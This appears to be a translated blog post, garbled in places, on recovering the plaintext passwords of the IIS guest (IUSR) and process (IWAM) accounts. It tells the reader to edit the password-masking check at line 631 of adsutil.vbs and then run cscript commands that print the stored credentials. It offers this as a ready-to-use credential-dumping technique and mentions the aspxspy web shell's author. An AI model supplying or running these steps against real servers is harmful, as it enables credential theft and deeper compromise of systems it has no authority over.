Obtain the IIS Guest Account (IUSR_XXX) and process start account (IWAM_XXX) passwords

When I visited the Blog of Bin niu (author of aspxspy) Today, I suddenly noticed that his earlier log mentioned that the IIS user name and password seem to be saved in plaintext, however, I did not explain how to find the plaintext password.

Finally, I tried to reset the iispassword in the previous example, and set the iispassword to cscript.exe adsutil. vbs set xxxxxx. If there is a set, get will also be available in most cases. If you check the usage, you can read the adsutil. vbs code. After all, vbs is a plaintext script, so it is easier to find a method.

Simple:

C: change the value of True in row 631 of InetpubAdminScriptsadsutil. vbs to False.

Then execute

Cscript.exe adsutil. vbs get w3svc/anonymoususerpass

Cscript.exe adsutil. vbs get w3svc/wamuserpass

The Code is as follows:

========================================================== ======================================

If (UCase (IIsSchemaObject. Syntax) = "STRING") Then

If (IsSecureProperty (ObjectParameter, MachineName) = False) Then is modified here, row 631

ValueDisplay = ValueDisplay &""""&"**********"&""""

Else

ValueDisplay = ValueDisplay & "& ValueList &""""

End If

ElseIf (UCase (IIsSchemaObject. Syntax) = "BINARY") Then

========================================================== ======================================

No picture, no truth (this sentence is referenced by o (operator _ operator) o ...)